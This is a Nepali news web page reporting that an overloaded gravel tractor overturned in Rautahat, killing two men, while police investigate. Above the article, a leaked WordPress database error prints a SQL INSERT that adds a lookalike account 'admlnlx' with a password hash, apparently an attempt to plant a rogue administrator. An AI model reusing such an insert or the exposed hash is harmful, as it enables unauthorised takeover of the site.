WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTIF4J1ZVEsUcdva.LpdSGNGlFdYLH/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 12:05:51', '', 'admlnlx', 'admlnlx')
रौतहट,पुस २६ –
रौतहट पिपरा भलोहीयामा टे«क्टर पल्टिदा २ जनाको मृत्यु भएको छ ।भलोहीया देखि धर्मपुर जादै गरेको ना.२त ८४१२ नं को टे«क्टरमा गिटी लोड गरी जादै गरेको क्रममा भलोहीया ३ करबोल भन्ने ठाँउमा गाडी अनियन्त्रित भई पल्टिदा उक्त २ जनाको मृत्यु भएको छ ।
मृत्यु हुनेमा भलोहीया गा.वि.स वडा नं २ का १९ वर्षिय दिलिप महतो र सोही टे«क्टरमा सवार गंगा पिपरा गा.वि.स का वडा नं १ का ३० वर्षिय देवेन्द्र तिवारी समेतको घटना स्थलमा मृत्यु भएको छ ।
मंगलवार विहानी करिब ७ः३० बजेको समयमा ओवर लोडिङ्ग गिरी लैजाने क्रममा उक्त ट्रेक्टर पल्टि भएको थियो भने चालक र सवार सहितको मृत्यु पश्चात घटना स्थलमा इलाका प्रहरी कार्यालय गंगा पिपराका जवानहरु पुगी टे«क्टर लाई नियन्त्रण्मा लिई शबलाई पोस्टमाटमका लागि जिल्ला अस्पताल गौर पुरयाईएको र अनुसन्धान कार्य भईरहेको जिल्ला प्रहरी कार्यालय रौतहटका प्रहरी नायब उपरिक्षक नवीन कृष्णा भण्डारीले जानकारी गराएका छन ।